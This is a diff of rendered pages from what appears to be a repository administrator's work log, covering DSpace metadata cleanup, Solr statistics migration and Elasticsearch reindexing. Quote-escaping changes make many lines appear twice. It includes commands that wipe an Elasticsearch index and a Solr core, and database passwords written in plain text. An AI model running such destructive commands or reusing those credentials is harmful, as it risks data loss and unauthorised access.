dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
COPY 730
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
COPY 71748
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.publisher&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.publisher&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
COPY 3882
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.source&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.source&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
COPY 3684
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.relation.ispartofseries&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.relation.ispartofseries&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
COPY 5598
</code></pre><ul>
<li>I noticed there are still some mappings for acronyms and other fixes that haven&rsquo;t been applied, so I ran my <code>create-mappings.py</code> script against Elasticsearch again
@ -1134,12 +1134,12 @@ COPY 5598
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ grep -c '&quot;find&quot;' /tmp/elasticsearch-mappings*
<pre tabindex="0"><code>$ grep -c &#39;&#34;find&#34;&#39; /tmp/elasticsearch-mappings*
/tmp/elasticsearch-mappings2.txt:350
/tmp/elasticsearch-mappings.txt:1228
$ cat /tmp/elasticsearch-mappings* | grep -v '{&quot;index&quot;:{}}' | wc -l
$ cat /tmp/elasticsearch-mappings* | grep -v &#39;{&#34;index&#34;:{}}&#39; | wc -l
1578
$ cat /tmp/elasticsearch-mappings* | grep -v '{&quot;index&quot;:{}}' | sort | uniq | wc -l
$ cat /tmp/elasticsearch-mappings* | grep -v &#39;{&#34;index&#34;:{}}&#39; | sort | uniq | wc -l
1578
</code></pre><ul>
<li>I have no idea why they wouldn&rsquo;t have been caught yesterday when I originally ran the script on a clean AReS with no mappings&hellip;
@ -1148,10 +1148,10 @@ $ cat /tmp/elasticsearch-mappings* | grep -v '{&quot;index&quot;:{}}' | sort | u
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat /tmp/elasticsearch-mappings* &gt; /tmp/new-elasticsearch-mappings.txt
$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> --data-binary @/tmp/new-elasticsearch-mappings.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/elasticsearch-mappings* &gt; /tmp/new-elasticsearch-mappings.txt
</span></span><span style="display:flex;"><span>$ curl -XDELETE http://localhost:9200/openrxv-values
</span></span><span style="display:flex;"><span>$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> --data-binary @/tmp/new-elasticsearch-mappings.txt
</span></span></code></pre></div><ul>
<li>The latest indexing (second for today!) finally finished on AReS and the countries and affiliations/crps/journals all look MUCH better
<ul>
<li>There are still a few acronyms present, some of which are in the value mappings and some which aren&rsquo;t</li>
@ -1160,7 +1160,7 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="co
<li>Lower case some straggling AGROVOC subjects on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 123
dspace=# COMMIT;
</code></pre><ul>
@ -1198,10 +1198,10 @@ $ dspace community-filiator --set --parent 10568/83389 --child 10568/56924
</code></pre><ul>
<li>Then I did a test to apply the corrections and deletions on my local DSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.source -t &#39;correct&#39; -m 55
$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.source -m 55
$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.publisher -t correct -m 39
$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.publisher -m 39
</code></pre><ul>
<li>I will wait to apply them on CGSpace when I have all the other corrections from Peter processed</li>
</ul>
@ -1214,8 +1214,8 @@ $ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace
</li>
<li>Quickly process the sponsor corrections Peter sent me a few days ago and test them locally:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t &#39;correct&#39; -m 29
$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29
</code></pre><ul>
<li>I applied all the fixes from today and yesterday on CGSpace and then started a full Discovery re-index:</li>
</ul>

View File

@ -32,7 +32,7 @@ So far we&rsquo;ve spent at least fifty hours to process the statistics and stat
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -150,8 +150,8 @@ So far we&rsquo;ve spent at least fifty hours to process the statistics and stat
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t &#39;correct&#39; -m 211
$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><ul>
<li>Then I started a Discovery re-index on CGSpace:</li>
</ul>
@ -191,7 +191,7 @@ sys 2m26.931s
<li>Since I was going to restart CGSpace and update the Discovery indexes anyways I decided to check for any straggling upper case AGROVOC entries and lower case them:</li>
</ul>
<pre tabindex="0"><code>dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 164
dspace=# COMMIT;
</code></pre><ul>
@ -314,8 +314,8 @@ $ git checkout origin/6_x-dev-atmire-modules
$ npm install -g yarn
$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2,\!dspace-jspui clean package
$ sudo su - postgres
$ psql dspace -c 'CREATE EXTENSION pgcrypto;'
$ psql dspace -c &quot;DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');&quot;
$ psql dspace -c &#39;CREATE EXTENSION pgcrypto;&#39;
$ psql dspace -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
$ exit
$ rm -rf /home/cgspace/config/spring
$ ant update
@ -338,7 +338,7 @@ $ sudo systemctl start tomcat7
# pg_upgradecluster 9.6 main
# pg_dropcluster 9.6 main
# systemctl start postgresql
# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.6 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><ul>
<li>Then I ran all system updates and rebooted the server&hellip;</li>
<li>After the server came back up I re-ran the Ansible playbook to make sure all configs and services were updated</li>
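<li>A sketch of that deployment step, assuming illustrative playbook and host names:</li>
</ul>
<pre tabindex="0"><code>$ ansible-playbook dspace.yml -l cgspace -K
</code></pre><ul>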
@ -372,13 +372,13 @@ Error sending email:
<li>I copied the <code>mail.extraproperties = mail.smtp.starttls.enable=true</code> setting from the old DSpace 5 <code>dspace.cfg</code> and now the emails are working</li>
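<li>DSpace has a built-in CLI check that is handy for verifying the mail configuration after such a change:</li>
</ul>
<pre tabindex="0"><code>$ dspace test-email
</code></pre><ul>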
<li>After the Discovery indexing finished I started processing the Solr stats one core and 2.5 million records at a time:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
</code></pre><ul>
<li>After about 6,000,000 records I got the same error that I&rsquo;ve gotten every time I test this migration process:</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -407,7 +407,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
<ul>
<li>There are almost 1,500 locks:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
1494
</code></pre><ul>
<li>I sent a mail to the dspace-tech mailing list to ask for help&hellip;
@ -454,8 +454,8 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -486,7 +486,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
<ul>
<li>There are over 2,000 locks:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2071
</code></pre><h2 id="2020-11-18">2020-11-18</h2>
<ul>
@ -603,7 +603,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive=&#39;t&#39; AND withdrawn=&#39;f&#39; AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
COPY 87411
</code></pre><ul>
<li>Saving some notes I wrote down about faceting by community and collection in Solr, for potential use in the future in the DSpace Statistics API</li>
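<li>For example, faceting item hits by owning community looks something like this (a sketch using the <code>owningComm</code> field mentioned above; <code>type:2</code> is an item hit in the DSpace statistics schema):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=type:2&amp;rows=0&amp;facet=true&amp;facet.field=owningComm&amp;wt=json&#39;
</code></pre><ul>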
@ -688,11 +688,11 @@ COPY 87411
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ xml sel -t -m '//value-pairs[@value-pairs-name=&quot;ilrisubject&quot;]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
</code></pre><ul>
<li>IWMI sent me a few new ORCID identifiers so I combined them with our existing ones as well as another ILRI one that Tezira asked me to update, filtered the unique ones, and then resolved their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2020-11-30-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-11-30-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2020-11-30-combined-orcids.txt -o /tmp/2020-11-30-combined-orcids-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -701,15 +701,15 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</ul>
<pre tabindex="0"><code>$ cat 2020-11-30-fix-hung-orcid.csv
cg.creator.id,correct
&quot;Hung Nguyen-Viet: 0000-0001-9877-0596&quot;,&quot;Hung Nguyen-Viet: 0000-0003-1549-2733&quot;
&quot;Adriana Tofiño: 0000-0001-7115-7169&quot;,&quot;Adriana Tofiño Rivera: 0000-0001-7115-7169&quot;
&quot;Cristhian Puerta Rodriguez: 0000-0001-5992-1697&quot;,&quot;David Puerta: 0000-0001-5992-1697&quot;
&quot;Ermias Betemariam: 0000-0002-1955-6995&quot;,&quot;Ermias Aynekulu: 0000-0002-1955-6995&quot;
&quot;Hirut Betaw: 0000-0002-1205-3711&quot;,&quot;Betaw Hirut: 0000-0002-1205-3711&quot;
&quot;Megan Zandstra: 0000-0002-3326-6492&quot;,&quot;Megan McNeil Zandstra: 0000-0002-3326-6492&quot;
&quot;Tolu Eyinla: 0000-0003-1442-4392&quot;,&quot;Toluwalope Emmanuel: 0000-0003-1442-4392&quot;
&quot;VInay Nangia: 0000-0001-5148-8614&quot;,&quot;Vinay Nangia: 0000-0001-5148-8614&quot;
$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
&#34;Hung Nguyen-Viet: 0000-0001-9877-0596&#34;,&#34;Hung Nguyen-Viet: 0000-0003-1549-2733&#34;
&#34;Adriana Tofiño: 0000-0001-7115-7169&#34;,&#34;Adriana Tofiño Rivera: 0000-0001-7115-7169&#34;
&#34;Cristhian Puerta Rodriguez: 0000-0001-5992-1697&#34;,&#34;David Puerta: 0000-0001-5992-1697&#34;
&#34;Ermias Betemariam: 0000-0002-1955-6995&#34;,&#34;Ermias Aynekulu: 0000-0002-1955-6995&#34;
&#34;Hirut Betaw: 0000-0002-1205-3711&#34;,&#34;Betaw Hirut: 0000-0002-1205-3711&#34;
&#34;Megan Zandstra: 0000-0002-3326-6492&#34;,&#34;Megan McNeil Zandstra: 0000-0002-3326-6492&#34;
&#34;Tolu Eyinla: 0000-0003-1442-4392&#34;,&#34;Toluwalope Emmanuel: 0000-0003-1442-4392&#34;
&#34;VInay Nangia: 0000-0001-5148-8614&#34;,&#34;Vinay Nangia: 0000-0001-5148-8614&#34;
$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p &#39;dom@in34sniper&#39; -f cg.creator.id -t &#39;correct&#39; -m 240
</code></pre>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t <span style="color:#ae81ff">12</span> -c statistics-2015
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t <span style="color:#ae81ff">12</span> -c statistics-2015
</span></span></code></pre></div><ul>
<li>AReS went down when the <code>renew-letsencrypt</code> service stopped the <code>angular_nginx</code> container in the pre-update hook and failed to bring it back up
<ul>
<li>I ran all system updates on the host and rebooted it and AReS came back up OK</li>
</ul>
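<ul>
<li>A quick way to check whether the container actually came back up after such a hook (a sketch; the container name is taken from the log above):</li>
</ul>
<pre tabindex="0"><code>$ docker ps -a | grep angular_nginx
$ docker start angular_nginx
</code></pre>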
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&quot;
</code></pre>
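<ul>
<li>A quick sanity check of the document counts on both cores before and after such a move (a sketch, assuming the same local Solr):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics-2010/select?q=*:*&amp;rows=0&amp;wt=json'
$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&amp;rows=0&amp;wt=json'
</code></pre>
<ul>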
<li>I deployed Tomcat 7.0.107 on DSpace Test (CGSpace is still Tomcat 7.0.104)</li>
<li>I finished migrating all the statistics from the yearly shards back to the main core</li>
<ul>
<li>First the 2010 core:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>Judging by the DSpace logs all these cores had a problem starting up in the last month:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -rsI <span style="color:#e6db74">&#34;Unable to create core&#34;</span> <span style="color:#f92672">[</span>dspace<span style="color:#f92672">]</span>/log/dspace.log.2020-* | grep -o -E <span style="color:#e6db74">&#34;statistics-[0-9]+&#34;</span> | sort | uniq -c
24 statistics-2010
24 statistics-2015
18 statistics-2016
6 statistics-2018
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -rsI <span style="color:#e6db74">&#34;Unable to create core&#34;</span> <span style="color:#f92672">[</span>dspace<span style="color:#f92672">]</span>/log/dspace.log.2020-* | grep -o -E <span style="color:#e6db74">&#34;statistics-[0-9]+&#34;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 24 statistics-2010
</span></span><span style="display:flex;"><span> 24 statistics-2015
</span></span><span style="display:flex;"><span> 18 statistics-2016
</span></span><span style="display:flex;"><span> 6 statistics-2018
</span></span></code></pre></div><ul>
<li>The message is always this:</li>
</ul>
<pre tabindex="0"><code>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
<pre tabindex="0"><code>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore &#39;statistics-2016&#39;: Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
</code></pre><ul>
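<ul>
<li>Finding any stale lock files on disk is straightforward (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ find [dspace]/solr -name write.lock
</code></pre>
<ul>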
<li>I will migrate all these cores and see if it makes a difference, then probably end up migrating all of them
<ul>
<ul>
<li>There are apparently 1,700 locks right now:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
1739
</code></pre></div><h2 id="2020-12-08">2020-12-08</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>1739
</span></span></code></pre></div><h2 id="2020-12-08">2020-12-08</h2>
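<ul>
<li>Grouping the locks by database, state, and mode gives a better idea of who is holding them (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT psa.datname, psa.state, pl.mode, COUNT(*) FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid GROUP BY 1, 2, 3 ORDER BY 4 DESC;'
</code></pre>
<h2 id="2020-12-08">2020-12-08</h2>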
<ul>
<li>Atmire sent some instructions for using the DeduplicateValuesProcessor
<ul>
</ul>
</li>
</ul>
<pre tabindex="0"><code>Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
<pre tabindex="0"><code>Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0, an error occured in the com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
<ul>
<li>I can see it in the <code>openrxv-items-final</code> index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&#39;</span> | json_pp
{
&#34;_shards&#34; : {
&#34;failed&#34; : 0,
&#34;skipped&#34; : 0,
&#34;successful&#34; : 1,
&#34;total&#34; : 1
},
&#34;count&#34; : 299922
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&#39;</span> | json_pp
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;count&#34; : 299922
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
